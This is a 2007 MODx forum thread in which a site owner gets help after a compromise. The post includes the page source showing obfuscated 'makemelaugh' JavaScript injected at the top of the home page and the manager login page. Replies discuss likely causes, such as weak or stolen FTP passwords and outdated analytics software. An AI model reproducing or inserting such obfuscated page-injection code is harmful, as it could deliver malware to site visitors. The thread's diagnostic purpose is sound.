We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 33372
    • 1,611 Posts
    And if this virus actually did spread to your MODx installation via 777 files being compromised, it almost certainly happened from some other account on the same server, which would mean that the server itself is infected or insecure and that is the root cause of the problem.

    The way that you have it installed seems to me to be both correct and secure, assuming your server is set up properly and not infected with some sort of worm. If you set the permissions indicated in the readme and turn register_globals off then you have a pretty solid setup. If you can get suExec running on your server that would be still more secure.

    The thing that would worry me in this situation is that it doesn’t sound as if the root cause of the problem has been dealt with, and until your server admins do that you can’t know if the problem won’t come back and bite you again soon.
      "Things are not what they appear to be; nor are they otherwise." - Buddha

      "Well, gee, Buddha - that wasn't very helpful..." - ZAP

      Useful MODx links: documentation | wiki | forum guidelines | bugs & requests | info you should include with your post | commercial support options
      • 24757
      • 9 Posts
      Alright, it happened again... but I’ve got info now. Please note: since the last attack assets/cache was set to 755 and the homepage was set to not cache. I am also having this conversation with my host, IXWebhosting.

      assets/cache contains three files:
      index.html not infected
      sitecache.idx infected with ’downloader’ virus.
      sitePublishing.idx infected with ’downloader’ virus.

      Downloader is a trojan (see http://www.symantec.com/security_response/writeup.jsp?docid=2002-101518-4323-99)

      A ’view page source’ of the home page revealed the following line inserted as line 1:
      <script language=JavaScript>function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,16,22,28,26,50,51,39,15,44,0,0,0,0,0,0,10,17,21,25,34,27,61,40,62,20,14,8,1,52,3,57,4,45,32,42,30,46,58,24,13,36,54,0,0,0,0,35,0,49,11,33,55,12,56,7,19,0,47,6,48,23,9,37,53,29,18,60,41,31,43,38,2,59,5);for(j=Math.ceil(l/b);j>0;j--){r=’’;for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(170^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}makemelaugh("2Je6Wjsa8vWZW7soK@9dTvXYz2K5Ndsabuecz_q6zVQ6CmflPhGZxvXD@ZFlJyQlmStDx0slXb9dmSno22fle_F5g0eo")</script><script language=JavaScript>function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,18,58,20,44,39,14,31,60,38,0,0,0,0,0,0,61,8,23,26,34,33,29,12,1,42,30,2,3,52,9,41,54,56,4,37,48,49,51,13,57,21,15,0,0,0,0,46,0,6,7,19,40,24,53,50,22,62,16,0,45,10,32,11,47,35,28,27,25,59,17,43,36,55,5);for(j=Math.ceil(l/b);j>0;j--){r=’’;for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(170^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}makemelaugh("h6GVep8UZwePe58SAm4yJwWxzhAgLy8Uo7GEzqFVz2lVtBQTRcdPKwWDmP@T6ulTBIODK08TWo4yBINShhQTGq@gb0GS")</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

      Manager login ’view page source’:
      <script language=JavaScript>function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,16,22,28,26,50,51,39,15,44,0,0,0,0,0,0,10,17,21,25,34,27,61,40,62,20,14,8,1,52,3,57,4,45,32,42,30,46,58,24,13,36,54,0,0,0,0,35,0,49,11,33,55,12,56,7,19,0,47,6,48,23,9,37,53,29,18,60,41,31,43,38,2,59,5);for(j=Math.ceil(l/b);j>0;j--){r=’’;for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(170^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}makemelaugh("2Je6Wjsa8vWZW7soK@9dTvXYz2K5Ndsabuecz_q6zVQ6CmflPhGZxvXD@ZFlJyQlmStDx0slXb9dmSno22fle_F5g0eo")</script>

      <b>Warning</b>: Cannot modify header information - headers already sent by (output started at /hsphere/local/home/bjd142/braddenenberg.com/assets/cache/siteCache.idx.php:4411) in <b>/hsphere/local/home/bjd142/braddenenberg.com/manager/index.php</b> on line <b>144</b>



      <b>Warning</b>: session_start() [<a href=’function.session-start’>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /hsphere/local/home/bjd142/braddenenberg.com/assets/cache/siteCache.idx.php:4411) in <b>/hsphere/local/home/bjd142/braddenenberg.com/manager/includes/config.inc.php</b> on line <b>41</b>


      <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
      <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
      <head>
      <title>MODx CMF Manager Login</title>
      <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
      <meta name="robots" content="noindex, nofollow" />

      <style type="text/css">
      /* Neutralize styles, fonts and viewport:
      ---------------------------------------------------------------- */
      html, body, form, fieldset {
      margin: 0;
      padding: 0;
      }
      html {
      font-size: 100.01%; /* avoids obscure font-size bug */
      line-height: 1.5; /* http://meyerweb.com/eric/thoughts/2006/02/08/unitless-line-heights/ */
      font-family: "Lucida Grande", Helvetica, Arial, sans-serif !important; /* IE ignores this and renders Arial better */
      font-family: Arial, Tahoma, Helvetica, sans-serif;
      height: 100%;
      color: #111;
      }
      body {
      font-size: 75%; /* 12px 62.5% for 10px*/
      height: 100%;
      margin-bottom: 1px; /* avoid jumping scrollbars */
      background: #F4F4F4
      }
      img, a img {
      border: 0 !important;
      text-decoration: none;
      padding: 0;
      margin: 0;
      }
      h1, h2, h3, h4, h5, h6, p, pre,
      blockquote, ul, ol, dl, address {
      margin: 0 0 .5em; /* Reset vertical margins on selected elements */
      padding: 0;
      }
      li, dd, blockquote {
      margin-left: 1em; /* Left margin only where needed */
      }

      /* Headers and Paragraphs:
      ---------------------------------------------------------------- */
      h1, h2, h3, h4, h5, h6 {
      font-weight: normal;
      }
      h1 { font-size: 218%; }
      h2 { font-size: 164%; }
      h3 { font-size: 145%; }
      h4 { font-size: 118%; }
      h5 { font-size: 100%; font-weight: bold; }
      h6 { font-size: 86%; font-weight: bold; }

      p.caption, p.comment { font-size: 86%; color: #888; }
      .warning{
      color: #821517;
      font-weight: bold;
      }
      .success{
      color: #090;
      font-weight: bold;
      }
      a, a:active, a:visited, a:link {
      color: #1a32c7;
      text-decoration: underline;
      }
      a:hover {
      color: #0f1e76;
      }
      input, .inputBox {
      padding: 1px;
      }
      .sectionHeader {
      padding: 5px 3px 5px 18px;
      font-weight: bold;
      color: #000;
      border-top: 1px solid #c5db88;
      background: #bee860 url(media/style/MODxLight/images/misc/greenfade.gif) repeat-x top;
      }
      .sectionBody {
      border: 1px solid #e3e3e3;
      border-top-color: #ccc;
      padding: 10px 20px 20px;
      display: block;
      background: #fff url(media/style/MODxLight/images/misc/tabareabg.gif) repeat-x top;
      }
      #mx_loginbox {
      width: 460px;
      margin: 70px auto 0;
      }
      img.loginCaptcha {
      border: 1px solid #039;
      width: 148px;
      height: 60px;
      }
      label {
      display: block;
      font-weight: bold;
      }
      input {
      margin: 0 0 10px 0;
      }
      input.checkbox {
      float: left;
      clear: left;
      margin-right: 3px;
      }
      input.text {
      width: 300px;
      }
      input.login {
      float: right;
      clear: right;
      margin-right: 25px;
      }
      .loginLicense {
      width: 460px;
      color: #555;
      margin: 0 auto;
      font-size: 90%;
      padding-left: 20px;
      }
      .loginLicense a {
      color: #94B451;
      font-size: 9px;
      }
      .notice {
      width: 100%;
      padding: 5px;
      border: 1px solid #eee;
      background-color: #F4F4F4;
      color: #707070;
      }
      #preLoader {
      position: absolute;
      z-index: 50000;
      width: 100%;
      height: 100%;
      text-align: center;
      vertical-align: middle;
      }
      .preLoaderText {
      background-color: #fff;
      width: 300px;
      height: 150px;
      padding: 50px;
      border: 1px solid #039;
      }
      </style>

      <script src="media/script/scriptaculous/prototype.js" type="text/javascript"></script>

      <script type="text/javascript">
      /* <![CDATA[ */
      if (top.frames.length!=0) {
      top.location=self.document.location;
      }

      function doLogin() {
      var f, values;
      if(!self.Ajax) document.loginfrm.submit();
      else {
      f = $(’loginfrm’);
      params = ’ajax=1&’ + Form.serialize(f);
      url = ’processors/login.processor.php’;
      new Ajax.Request(url,{method:’post’,parameters:params,onComplete:ajaxReturn});
      Form.disable(f);
      return false;
      }
      }

      function ajaxReturn(response) {
      var text = response.responseText;
      var header = text.substr(0,9)
      if (header.toLowerCase()==’location:’) top.location = text.substr(10);
      else {
      var f = $(’loginfrm’);
      Form.enable(f);
      alert(text);
      }
      }
      /* ]]> */
      </script>
      </head>
      <body onload="javascript:document.loginfrm.username.focus();" id="login">

      <div id="mx_loginbox">
      <form method="post" name="loginfrm" id="loginfrm" action="processors/login.processor.php">
      <!-- anything to output before the login box via a plugin? -->


      <div class="sectionHeader">BradDenenberg.com</div>
      <div class="sectionBody">

      <p class="loginMessage">Please enter your login credentials to start your Manager session. Your username and password are case-sensitive, so please enter them carefully!</p>

      <label>Username </label>
      <input type="text" class="text" name="username" id="username" tabindex="1" value="" />

      <label>Password </label>
      <input type="password" class="text" name="password" id="password" tabindex="2" value="" />

      <p class="caption"></p>

      <div></div>


      <input type="checkbox" id="rememberme" name="rememberme" tabindex="4" value="1" class="checkbox" /><label for="rememberme" style="cursor:pointer">Remember me</label>
      <input type="submit" class="login" id="submitButton" value="Login" onclick="return doLogin();" />

      <!-- anything to output before the login box via a plugin ... like the forgot password link? -->
      <div id="onManagerLoginFormRender"><a id="ForgotManagerPassword-show_form" href="index.php?action=show_form">Forgot your password?</a></div>
      </div>
      </form>

      </div>
      <!-- close #mx_loginbox -->

      <!-- convert this to a language include -->
      <p class="loginLicense">
      &copy; 2005-2006 by the <a href="http://modxcms.com/" target="_blank">MODx CMF Team</a>. <strong>MODx</strong>&trade; is licensed under the GPL.
      </p>

      </body>
      </html>


      Index screen shot attached. Notice the two dots in center-top.
      Manager screen shot attached.
        • 25663 MODX Staff
        • 12,272 Posts
        Looks like you’re running 095 or later now. What was it running when your site was compromised again? Also, what other applications are running on that URL?
          Ryan Thrash, MODX Co-Founder
          Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
          • 24757
          • 9 Posts
          Yes, I am running the standard 0.9.5... the standard version (no mods). I have not installed anything else on this URL. I am using IXWebhosting for two other sites, one ModX and one non-ModX, without complication.
            • 25663 MODX Staff
            • 12,272 Posts
            Any chance we could get a login to your site to see if we spot any potentially troublesome spots? If so, please PM me the details. Thanks!
              Ryan Thrash, MODX Co-Founder
              Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
              • 3188
              • 75 Posts
              Are you shure that the passwords used to access your sites has not been comprimised?
              If someone got a trojan on your computer, they could get your passwords for C-panel (if you got one) or FTP.
                • 33372
                • 1,611 Posts
                This is a Windows virus, and not one that seems to infect web servers or their contents at all. So unless this is a modified version of the virus (or a different virus with a similar footprint), it’s not being spread on your server (which would have to be Windows in any case - not Linux). It would either be being spread by someone with an infected Windows machine connecting to it or a hacker with access to your cache files (perhaps because they have stolen your FTP password). As beryl asked, have you changed all of your passwords since the first attack (MODx, FTP, Control Panel, database)?
                  "Things are not what they appear to be; nor are they otherwise." - Buddha

                  "Well, gee, Buddha - that wasn&#39;t very helpful..." - ZAP

                  Useful MODx links: documentation | wiki | forum guidelines | bugs & requests | info you should include with your post | commercial support options
                  • 25663 MODX Staff
                  • 12,272 Posts
                  I’ve looked into the server and there’s some web analytics running on the same domain that might provide an attack vector: Webalizer 2.01 and ModLogAn 0.5.7 ... my suspicion is that one of those could provide the exploit, but no definitive answer.
                    Ryan Thrash, MODX Co-Founder
                    Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
                    • 24757
                    • 9 Posts
                    First off... thanks everyone for the assistance... yet another reason to like MODx.

                    I have not changed the passwords since the first attack. And come to think of it the original passwords were really weak. I will change the passwords after rthrash is done viewing the site.

                    I believe the analytics come with C-Panel. I have never had trouble with them before (though that doesn’t necessarily mean anything). IXWebhosting has not gotten back to me yet but I will bing up the laundry list you [rthrash] pm’d me.
                      • 33372
                      • 1,611 Posts
                      Quote from: rthrash at Apr 04, 2007, 11:49 AM

                      I’ve looked into the server and there’s some web analytics running on the same domain that might provide an attack vector: Webalizer 2.01 and ModLogAn 0.5.7 ... my suspicion is that one of those could provide the exploit, but no definitive answer.

                      Well there’s this for Webalizer:
                      http://www.securityfocus.com/advisories/4593
                      Which may or may not apply on your server, and if you have the latest version (2.01-10) is patched anyway.

                      And ModLogAn is no longer being maintained, but it got to 0.8.1.3 before they stopped making it, and there were many patches between 0.5.7 and that:
                      http://jan.kneschke.de/projects/modlogan/

                      So I would definitely disable ModLogAn, since it’s not being maintained at all anymore and that’s an ancient version.

                      Still if this is a Linux server that would have to be a very different virus than the one you seem to have identified. It looks to me as if part of that virus’ code is being inserted into your cache, either by a script or manually. If you have suExec running now you can probably rule out a worm on your server as the cause.
                        "Things are not what they appear to be; nor are they otherwise." - Buddha

                        "Well, gee, Buddha - that wasn&#39;t very helpful..." - ZAP

                        Useful MODx links: documentation | wiki | forum guidelines | bugs & requests | info you should include with your post | commercial support options